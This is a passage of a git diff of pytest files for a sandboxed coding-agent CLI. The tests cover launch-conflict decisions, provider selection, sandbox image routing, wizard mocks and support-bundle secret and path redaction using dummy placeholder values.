offline=False, + standalone=True, + dry_run=False, + json_output=False, + pretty=False, + non_interactive=False, + debug=False, + allow_suspicious_workspace=False, + provider="codex", + ) + + +@patch("scc_cli.commands.launch.flow.finalize_launch") +@patch("scc_cli.commands.launch.flow._record_session_and_context") +@patch("scc_cli.commands.launch.flow.resolve_launch_conflict") +@patch("scc_cli.commands.launch.flow.show_launch_panel") +@patch("scc_cli.commands.launch.flow.warn_if_non_worktree") +@patch("scc_cli.commands.launch.flow._apply_personal_profile", return_value=(None, False)) +@patch("scc_cli.commands.launch.flow.render_launch_output") +@patch("scc_cli.commands.launch.flow.build_sync_output_view_model") +@patch("scc_cli.commands.launch.flow.prepare_live_start_plan") +@patch( + "scc_cli.commands.launch.flow.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), +) +@patch("scc_cli.commands.launch.flow.resolve_launch_provider", return_value=("codex", "explicit")) +@patch("scc_cli.commands.launch.flow.resolve_workspace_team", return_value=None) +@patch("scc_cli.commands.launch.flow.prepare_workspace") +@patch("scc_cli.commands.launch.flow.validate_and_resolve_workspace") +@patch("scc_cli.commands.launch.flow.sessions.get_session_service") +@patch("scc_cli.commands.launch.flow.get_default_adapters") +@patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) +@patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) +def test_start_keep_existing_exits_cleanly_without_recording_or_launching( + mock_setup: MagicMock, + mock_cfg: MagicMock, + mock_get_adapters: MagicMock, + mock_session_service: MagicMock, + mock_validate_workspace: MagicMock, + mock_prepare_workspace: MagicMock, + mock_resolve_team: MagicMock, + mock_resolve_provider: MagicMock, + mock_collect_readiness: MagicMock, + mock_prepare_live_start_plan: MagicMock, + mock_build_output: MagicMock, + mock_render_output: MagicMock, + mock_apply_profile: MagicMock, + mock_warn_non_worktree: MagicMock, + mock_show_launch: MagicMock, + mock_resolve_conflict: MagicMock, + mock_record_session: MagicMock, + mock_finalize_launch: MagicMock, + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path) + mock_get_adapters.return_value = _build_adapters() + mock_validate_workspace.return_value = tmp_path + mock_prepare_workspace.return_value = tmp_path + mock_prepare_live_start_plan.return_value = (_build_start_dependencies(), plan) + mock_resolve_conflict.return_value = LaunchConflictResolution( + decision=LaunchConflictDecision.KEEP_EXISTING, + plan=plan, + ) + + with pytest.raises(typer.Exit) as exc: + _invoke_start(tmp_path) + + assert exc.value.exit_code == 0 + mock_record_session.assert_not_called() + mock_finalize_launch.assert_not_called() + + +@patch("scc_cli.commands.launch.flow.finalize_launch") +@patch("scc_cli.commands.launch.flow._record_session_and_context") +@patch("scc_cli.commands.launch.flow.resolve_launch_conflict") +@patch("scc_cli.commands.launch.flow.show_launch_panel") +@patch("scc_cli.commands.launch.flow.warn_if_non_worktree") +@patch("scc_cli.commands.launch.flow._apply_personal_profile", return_value=(None, False)) +@patch("scc_cli.commands.launch.flow.render_launch_output") +@patch("scc_cli.commands.launch.flow.build_sync_output_view_model") +@patch("scc_cli.commands.launch.flow.prepare_live_start_plan") +@patch( + "scc_cli.commands.launch.flow.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), +) +@patch("scc_cli.commands.launch.flow.resolve_launch_provider", return_value=("codex", "explicit")) +@patch("scc_cli.commands.launch.flow.resolve_workspace_team", return_value=None) +@patch("scc_cli.commands.launch.flow.prepare_workspace") +@patch("scc_cli.commands.launch.flow.validate_and_resolve_workspace") +@patch("scc_cli.commands.launch.flow.sessions.get_session_service") +@patch("scc_cli.commands.launch.flow.get_default_adapters") +@patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) +@patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) +def test_start_cancel_conflict_exits_130_without_recording_or_launching( + mock_setup: MagicMock, + mock_cfg: MagicMock, + mock_get_adapters: MagicMock, + mock_session_service: MagicMock, + mock_validate_workspace: MagicMock, + mock_prepare_workspace: MagicMock, + mock_resolve_team: MagicMock, + mock_resolve_provider: MagicMock, + mock_collect_readiness: MagicMock, + mock_prepare_live_start_plan: MagicMock, + mock_build_output: MagicMock, + mock_render_output: MagicMock, + mock_apply_profile: MagicMock, + mock_warn_non_worktree: MagicMock, + mock_show_launch: MagicMock, + mock_resolve_conflict: MagicMock, + mock_record_session: MagicMock, + mock_finalize_launch: MagicMock, + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path) + mock_get_adapters.return_value = _build_adapters() + mock_validate_workspace.return_value = tmp_path + mock_prepare_workspace.return_value = tmp_path + mock_prepare_live_start_plan.return_value = (_build_start_dependencies(), plan) + mock_resolve_conflict.return_value = LaunchConflictResolution( + decision=LaunchConflictDecision.CANCELLED, + plan=plan, + ) + + with pytest.raises(typer.Exit) as exc: + _invoke_start(tmp_path) + + assert exc.value.exit_code == 130 + mock_record_session.assert_not_called() + mock_finalize_launch.assert_not_called() + + +@patch("scc_cli.commands.launch.flow.finalize_launch") +@patch("scc_cli.commands.launch.flow._record_session_and_context") +@patch("scc_cli.commands.launch.flow.resolve_launch_conflict") +@patch("scc_cli.commands.launch.flow.show_launch_panel") +@patch("scc_cli.commands.launch.flow.warn_if_non_worktree") +@patch("scc_cli.commands.launch.flow._apply_personal_profile", return_value=(None, False)) +@patch("scc_cli.commands.launch.flow.render_launch_output") +@patch("scc_cli.commands.launch.flow.build_sync_output_view_model") +@patch("scc_cli.commands.launch.flow.prepare_live_start_plan") +@patch( + "scc_cli.commands.launch.flow.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), +) +@patch("scc_cli.commands.launch.flow.resolve_launch_provider", return_value=("codex", "explicit")) +@patch("scc_cli.commands.launch.flow.resolve_workspace_team", return_value=None) +@patch("scc_cli.commands.launch.flow.prepare_workspace") +@patch("scc_cli.commands.launch.flow.validate_and_resolve_workspace") +@patch("scc_cli.commands.launch.flow.sessions.get_session_service") +@patch("scc_cli.commands.launch.flow.get_default_adapters") +@patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}) +@patch("scc_cli.commands.launch.flow.setup.is_setup_needed", return_value=False) +def test_start_replace_conflict_records_then_launches_with_updated_plan( + mock_setup: MagicMock, + mock_cfg: MagicMock, + mock_get_adapters: MagicMock, + mock_session_service: MagicMock, + mock_validate_workspace: MagicMock, + mock_prepare_workspace: MagicMock, + mock_resolve_team: MagicMock, + mock_resolve_provider: MagicMock, + mock_collect_readiness: MagicMock, + mock_prepare_live_start_plan: MagicMock, + mock_build_output: MagicMock, + mock_render_output: MagicMock, + mock_apply_profile: MagicMock, + mock_warn_non_worktree: MagicMock, + mock_show_launch: MagicMock, + mock_resolve_conflict: MagicMock, + mock_record_session: MagicMock, + mock_finalize_launch: MagicMock, + tmp_path: Path, +) -> None: + plan = _build_plan(tmp_path) + assert plan.sandbox_spec is not None + updated_plan = replace( + plan, + fresh=True, + sandbox_spec=replace(plan.sandbox_spec, force_new=True), + ) + mock_get_adapters.return_value = _build_adapters() + mock_validate_workspace.return_value = tmp_path + mock_prepare_workspace.return_value = tmp_path + mock_prepare_live_start_plan.return_value = (_build_start_dependencies(), plan) + mock_resolve_conflict.return_value = LaunchConflictResolution( + decision=LaunchConflictDecision.PROCEED, + plan=updated_plan, + ) + + _invoke_start(tmp_path) + + mock_record_session.assert_called_once() + mock_finalize_launch.assert_called_once_with( + updated_plan, dependencies=mock_prepare_live_start_plan.return_value[0] + ) diff --git a/tests/test_start_provider_choice.py b/tests/test_start_provider_choice.py new file mode 100644 index 0000000..7f4cf21 --- /dev/null +++ b/tests/test_start_provider_choice.py @@ -0,0 +1,158 @@ +"""Tests for start-time provider choice policy.""" + +from __future__ import annotations + +from unittest.mock import MagicMock + +import pytest + +from scc_cli.commands.launch.provider_choice import choose_start_provider +from scc_cli.core.errors import ProviderNotReadyError + + +def test_explicit_provider_skips_prompt() -> None: + prompt = MagicMock(return_value="claude") + + result = choose_start_provider( + cli_flag="codex", + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "codex" + prompt.assert_not_called() + + +def test_resume_provider_beats_connected_auto_choice() -> None: + result = choose_start_provider( + cli_flag=None, + resume_provider="codex", + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude",), + allowed_providers=(), + non_interactive=False, + prompt_choice=None, + ) + + assert result == "codex" + + +def test_single_connected_provider_auto_selected() -> None: + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("codex",), + allowed_providers=(), + non_interactive=False, + prompt_choice=None, + ) + + assert result == "codex" + + +def test_prompt_used_when_multiple_allowed_and_no_preference() -> None: + prompt = MagicMock(return_value="claude") + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "claude" + prompt.assert_called_once_with(("claude", "codex"), ("claude", "codex"), None) + + +def test_cancelled_prompt_returns_none() -> None: + prompt = MagicMock(return_value=None) + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result is None + + +def test_explicit_ask_preference_prompts_even_with_workspace_last_used() -> None: + prompt = MagicMock(return_value="claude") + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="ask", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "claude" + prompt.assert_called_once_with(("claude", "codex"), ("claude", "codex"), "codex") + + +def test_prompt_preselects_workspace_last_used_when_global_policy_is_ask() -> None: + prompt = MagicMock(return_value="codex") + + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="ask", + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=False, + prompt_choice=prompt, + ) + + assert result == "codex" + prompt.assert_called_once_with(("claude", "codex"), ("claude", "codex"), "codex") + + +def test_explicit_ask_preference_still_auto_selects_single_connected_provider() -> None: + result = choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used="codex", + config_provider="ask", + connected_provider_ids=("claude",), + allowed_providers=(), + non_interactive=False, + prompt_choice=None, + ) + + assert result == "claude" + + +def test_non_interactive_multiple_options_fail_closed() -> None: + with pytest.raises(ProviderNotReadyError, match="Multiple providers are available"): + choose_start_provider( + cli_flag=None, + resume_provider=None, + workspace_last_used=None, + config_provider=None, + connected_provider_ids=("claude", "codex"), + allowed_providers=(), + non_interactive=True, + prompt_choice=None, + ) diff --git a/tests/test_start_session_image_routing.py b/tests/test_start_session_image_routing.py new file mode 100644 index 0000000..7f21f6d --- /dev/null +++ b/tests/test_start_session_image_routing.py @@ -0,0 +1,136 @@ +"""Tests for _build_sandbox_spec image routing based on runtime info.""" + +from __future__ import annotations + +from pathlib import Path + +import pytest + +from scc_cli.application.start_session import _DOCKER_DESKTOP_CLAUDE_IMAGE as SANDBOX_IMAGE +from scc_cli.application.start_session import StartSessionRequest, _build_sandbox_spec +from scc_cli.core.contracts import RuntimeInfo +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.image_contracts import SCC_CLAUDE_IMAGE_REF +from scc_cli.core.workspace import ResolverResult + + +def _make_runtime_info(preferred_backend: str) -> RuntimeInfo: + return RuntimeInfo( + runtime_id="docker", + display_name="Docker", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + daemon_reachable=True, + sandbox_available=True, + preferred_backend=preferred_backend, + ) + + +def _make_request(dry_run: bool = False) -> StartSessionRequest: + return StartSessionRequest( + workspace_path=Path("/tmp/test-workspace"), + workspace_arg=None, + entry_dir=Path("/tmp/test-workspace"), + team=None, + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=dry_run, + allow_suspicious=False, + org_config=None, + ) + + +def _make_resolver_result() -> ResolverResult: + return ResolverResult( + workspace_root=Path("/tmp/test-workspace"), + entry_dir=Path("/tmp/test-workspace"), + mount_root=Path("/tmp/test-workspace"), + container_workdir="/tmp/test-workspace", + is_auto_detected=False, + is_suspicious=False, + ) + + +class TestBuildSandboxSpecImageRouting: + """Verify _build_sandbox_spec selects the correct image based on runtime_info.""" + + def test_oci_backend_uses_scc_image(self) -> None: + """OCI backend routes to SCC_CLAUDE_IMAGE_REF when provider is wired.""" + from scc_cli.adapters.claude_agent_provider import ClaudeAgentProvider + + info = _make_runtime_info("oci") + spec = _build_sandbox_spec( + request=_make_request(), + resolver_result=_make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=info, + agent_provider=ClaudeAgentProvider(), + ) + assert spec is not None + assert spec.image == SCC_CLAUDE_IMAGE_REF + + def test_oci_backend_no_provider_raises(self) -> None: + """D032: OCI backend without provider wiring raises ProviderNotReadyError.""" + info = _make_runtime_info("oci") + with pytest.raises(ProviderNotReadyError): + _build_sandbox_spec( + request=_make_request(), + resolver_result=_make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=info, + ) + + def test_docker_sandbox_backend_uses_default_image(self) -> None: + """Docker-sandbox backend uses the Docker Desktop sandbox template image.""" + info = _make_runtime_info("docker-sandbox") + spec = _build_sandbox_spec( + request=_make_request(), + resolver_result=_make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=info, + ) + assert spec is not None + assert spec.image == SANDBOX_IMAGE + + def test_none_runtime_info_uses_default_image(self) -> None: + """When runtime_info is None, falls back to SANDBOX_IMAGE.""" + spec = _build_sandbox_spec( + request=_make_request(), + resolver_result=_make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=None, + ) + assert spec is not None + assert spec.image == SANDBOX_IMAGE + + def test_no_runtime_info_kwarg_uses_default_image(self) -> None: + """When runtime_info is not passed at all, defaults to SANDBOX_IMAGE.""" + spec = _build_sandbox_spec( + request=_make_request(), + resolver_result=_make_resolver_result(), + effective_config=None, + agent_settings=None, + ) + assert spec is not None + assert spec.image == SANDBOX_IMAGE + + def test_dry_run_returns_none(self) -> None: + """Dry-run returns None regardless of runtime_info.""" + info = _make_runtime_info("oci") + spec = _build_sandbox_spec( + request=_make_request(dry_run=True), + resolver_result=_make_resolver_result(), + effective_config=None, + agent_settings=None, + runtime_info=info, + ) + assert spec is None diff --git a/tests/test_start_wizard_quick_resume_flow.py b/tests/test_start_wizard_quick_resume_flow.py index a66f1f3..eadedde 100644 --- a/tests/test_start_wizard_quick_resume_flow.py +++ b/tests/test_start_wizard_quick_resume_flow.py @@ -12,11 +12,16 @@ def test_quick_resume_new_session_moves_to_workspace_source() -> None: from scc_cli.ui.wizard import WorkspaceSource with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=True), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=True + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", return_value=(QuickResumeResult.NEW_SESSION, None), @@ -35,11 +40,16 @@ def test_quick_resume_back_returns_cancelled() -> None: from scc_cli.commands.launch import interactive_start with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=True), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=True + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", return_value=(QuickResumeResult.BACK, None), @@ -62,11 +72,16 @@ def test_quick_resume_selects_context_returns_immediately() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=True), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=True + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", return_value=(QuickResumeResult.SELECTED, context), diff --git a/tests/test_start_wizard_workspace_quick_resume.py b/tests/test_start_wizard_workspace_quick_resume.py index 8711bd8..a66f178 100644 --- a/tests/test_start_wizard_workspace_quick_resume.py +++ b/tests/test_start_wizard_workspace_quick_resume.py @@ -20,11 +20,16 @@ def test_workspace_quick_resume_returns_selected_context() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=False), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=False + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", side_effect=[ @@ -61,11 +66,16 @@ def test_workspace_quick_resume_new_session_keeps_workspace() -> None: ) with ( - patch("scc_cli.commands.launch.flow.config.is_standalone_mode", return_value=False), - patch("scc_cli.commands.launch.flow.config.load_cached_org_config", return_value={}), - patch("scc_cli.commands.launch.flow.config.load_user_config", return_value={}), - patch("scc_cli.commands.launch.flow.teams.list_teams", return_value=[]), - patch("scc_cli.commands.launch.flow.load_recent_contexts", return_value=[context]), + patch( + "scc_cli.commands.launch.flow_interactive.config.is_standalone_mode", return_value=False + ), + patch( + "scc_cli.commands.launch.flow_interactive.config.load_cached_org_config", + return_value={}, + ), + patch("scc_cli.commands.launch.flow_interactive.config.load_user_config", return_value={}), + patch("scc_cli.commands.launch.flow_interactive.teams.list_teams", return_value=[]), + patch("scc_cli.commands.launch.wizard_resume.load_recent_contexts", return_value=[context]), patch( "scc_cli.ui.wizard.pick_context_quick_resume", side_effect=[ diff --git a/tests/test_status.py b/tests/test_status.py index 4fc5525..66aba57 100644 --- a/tests/test_status.py +++ b/tests/test_status.py @@ -38,7 +38,9 @@ def test_status_shows_organization_name(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd() captured = capsys.readouterr() @@ -57,7 +59,9 @@ def test_status_shows_current_team(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd() captured = capsys.readouterr() @@ -74,7 +78,9 @@ def test_status_shows_no_team_selected(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd() captured = capsys.readouterr() @@ -110,7 +116,7 @@ def test_status_shows_running_session(self, capsys): "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): with patch( - "scc_cli.commands.admin.docker.list_running_sandboxes", + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[mock_container], ): status_cmd() @@ -130,7 +136,9 @@ def test_status_shows_no_active_session(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd() captured = capsys.readouterr() @@ -161,7 +169,9 @@ def test_status_json_has_correct_kind(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): try: status_cmd(json_output=True, pretty=False) except click.exceptions.Exit: @@ -182,7 +192,9 @@ def test_status_json_has_envelope_structure(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): try: status_cmd(json_output=True, pretty=False) except click.exceptions.Exit: @@ -218,7 +230,9 @@ def test_status_json_data_contains_expected_fields(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): try: status_cmd(json_output=True, pretty=False) except click.exceptions.Exit: @@ -260,7 +274,9 @@ def test_status_verbose_shows_source_urls(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd(verbose=True) captured = capsys.readouterr() @@ -295,7 +311,9 @@ def test_status_verbose_shows_delegation_info(self, capsys): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd(verbose=True) captured = capsys.readouterr() @@ -325,7 +343,9 @@ def test_status_shows_workspace_path(self, capsys, tmp_path, monkeypatch): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd() captured = capsys.readouterr() @@ -348,7 +368,9 @@ def test_status_indicates_scc_yaml_present(self, capsys, tmp_path, monkeypatch): with patch( "scc_cli.commands.admin.config.load_cached_org_config", return_value=mock_org ): - with patch("scc_cli.commands.admin.docker.list_running_sandboxes", return_value=[]): + with patch( + "scc_cli.commands.admin.docker.list_running_scc_containers", return_value=[] + ): status_cmd() captured = capsys.readouterr() diff --git a/tests/test_support_bundle.py b/tests/test_support_bundle.py index 34d69d1..9bd373b 100644 --- a/tests/test_support_bundle.py +++ b/tests/test_support_bundle.py @@ -1,378 +1,354 @@ -""" -Tests for support bundle command (Phase 4). - -TDD approach: Tests written before implementation. -These tests define the contract for: -- Support bundle creation with collected data -- Secret redaction (auth, tokens, API keys) -- Path redaction (home paths, repo names) -- JSON manifest output -- Custom output path -""" +"""Tests for the shared support-bundle implementation.""" + +from __future__ import annotations import json import zipfile +from datetime import datetime, timezone from pathlib import Path from unittest.mock import patch import click -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for Secret Redaction (Pure Function) -# ═══════════════════════════════════════════════════════════════════════════════ +from scc_cli.adapters.local_audit_event_sink import serialize_audit_event +from scc_cli.adapters.zip_archive_writer import ZipArchiveWriter +from scc_cli.application.support_bundle import ( + SUPPORT_BUNDLE_AUDIT_LIMIT, + SupportBundleDependencies, + SupportBundleRequest, + build_support_bundle_manifest, + create_support_bundle, + get_default_support_bundle_path, + redact_paths, + redact_secrets, +) +from scc_cli.core.contracts import AuditEvent +from scc_cli.core.enums import SeverityLevel +from scc_cli.doctor import CheckResult, DoctorResult -class TestSecretRedaction: - """Test secret redaction in support bundles.""" +class _FakeFilesystem: + def __init__(self, files: dict[Path, str] | None = None) -> None: + self._files = files or {} - def test_redact_secrets_replaces_auth_values(self) -> None: - """Auth values should be replaced with [REDACTED].""" - from scc_cli.support_bundle import redact_secrets + def exists(self, path: Path) -> bool: + return path in self._files - data = { - "auth": "secret-token-12345", - "name": "test-config", - } - result = redact_secrets(data) + def read_text(self, path: Path) -> str: + return self._files[path] - assert result["auth"] == "[REDACTED]" - assert result["name"] == "test-config" - def test_redact_secrets_replaces_token_values(self) -> None: - """Token values should be replaced with [REDACTED].""" - from scc_cli.support_bundle import redact_secrets - - data = { - "token": "ghp_abc123xyz", - "api_token": "sk-proj-12345", - "access_token": "ya29.abc", - } - result = redact_secrets(data) - - assert result["token"] == "[REDACTED]" - assert result["api_token"] == "[REDACTED]" - assert result["access_token"] == "[REDACTED]" - - def test_redact_secrets_replaces_api_key_values(self) -> None: - """API key values should be replaced with [REDACTED].""" - from scc_cli.support_bundle import redact_secrets - - data = { - "api_key": "sk-ant-api03-xxx", - "apiKey": "AIzaSyB-xxx", - "API_KEY": "AKIAIOSFODNN7EXAMPLE", - } - result = redact_secrets(data) - - assert result["api_key"] == "[REDACTED]" - assert result["apiKey"] == "[REDACTED]" - assert result["API_KEY"] == "[REDACTED]" - - def test_redact_secrets_replaces_password_values(self) -> None: - """Password values should be replaced with [REDACTED].""" - from scc_cli.support_bundle import redact_secrets - - data = { - "password": "super-secret", - "db_password": "postgres123", - } - result = redact_secrets(data) - - assert result["password"] == "[REDACTED]" - assert result["db_password"] == "[REDACTED]" - - def test_redact_secrets_handles_nested_dicts(self) -> None: - """Nested dictionaries should have secrets redacted.""" - from scc_cli.support_bundle import redact_secrets - - data = { - "config": { - "auth": "nested-secret", - "name": "nested-name", - } - } - result = redact_secrets(data) +class _FixedClock: + def now(self) -> datetime: + return datetime(2024, 1, 1, 0, 0, 0, tzinfo=timezone.utc) - assert result["config"]["auth"] == "[REDACTED]" - assert result["config"]["name"] == "nested-name" - def test_redact_secrets_handles_lists(self) -> None: - """Lists containing dicts should have secrets redacted.""" - from scc_cli.support_bundle import redact_secrets +class _PassingDoctorRunner: + def run(self, workspace: str | None = None) -> DoctorResult: + return DoctorResult(checks=[CheckResult(name="Docker", passed=True, message="OK")]) - data = { - "plugins": [ - {"name": "plugin1", "token": "secret1"}, - {"name": "plugin2", "token": "secret2"}, - ] - } - result = redact_secrets(data) - assert result["plugins"][0]["name"] == "plugin1" - assert result["plugins"][0]["token"] == "[REDACTED]" - assert result["plugins"][1]["token"] == "[REDACTED]" +class _FailingDoctorRunner: + def __init__(self, message: str = "Doctor check failed") -> None: + self._message = message - def test_redact_secrets_strips_authorization_headers(self) -> None: - """Authorization headers should be stripped.""" - from scc_cli.support_bundle import redact_secrets + def run(self, workspace: str | None = None) -> DoctorResult: + raise RuntimeError(self._message) - data = { - "headers": { - "Authorization": "Bearer secret-jwt-token", - "Content-Type": "application/json", - } - } - result = redact_secrets(data) - assert result["headers"]["Authorization"] == "[REDACTED]" - assert result["headers"]["Content-Type"] == "application/json" +def _make_dependencies( + *, + filesystem: _FakeFilesystem | None = None, + doctor_runner: _PassingDoctorRunner | _FailingDoctorRunner | None = None, + archive_writer: ZipArchiveWriter | None = None, + launch_audit_path: Path | None = None, +) -> SupportBundleDependencies: + return SupportBundleDependencies( + filesystem=filesystem or _FakeFilesystem(), # type: ignore[arg-type] + clock=_FixedClock(), # type: ignore[arg-type] + doctor_runner=doctor_runner or _PassingDoctorRunner(), # type: ignore[arg-type] + archive_writer=archive_writer or ZipArchiveWriter(), # type: ignore[arg-type] + launch_audit_path=launch_audit_path or Path("/tmp/launch-events.jsonl"), + ) -# ═══════════════════════════════════════════════════════════════════════════════ -# Tests for Path Redaction (Pure Function) -# ═══════════════════════════════════════════════════════════════════════════════ +class TestSecretRedaction: + def test_redact_secrets_replaces_auth_values(self) -> None: + result = redact_secrets({"auth": "secret-token-12345", "name": "test-config"}) + assert result["auth"] == "[REDACTED]" + assert result["name"] == "test-config" -class TestPathRedaction: - """Test path redaction in support bundles.""" + def test_redact_secrets_replaces_nested_token_values(self) -> None: + result = redact_secrets( + { + "headers": {"Authorization": "Bearer secret-jwt-token"}, + "plugins": [ + {"name": "plugin1", "token": "secret1"}, + {"name": "plugin2", "token": "secret2"}, + ], + } + ) + + assert result["headers"]["Authorization"] == "[REDACTED]" + assert result["plugins"][0]["token"] == "[REDACTED]" + assert result["plugins"][1]["token"] == "[REDACTED]" - def test_redact_paths_replaces_home_directory(self) -> None: - """Home directory 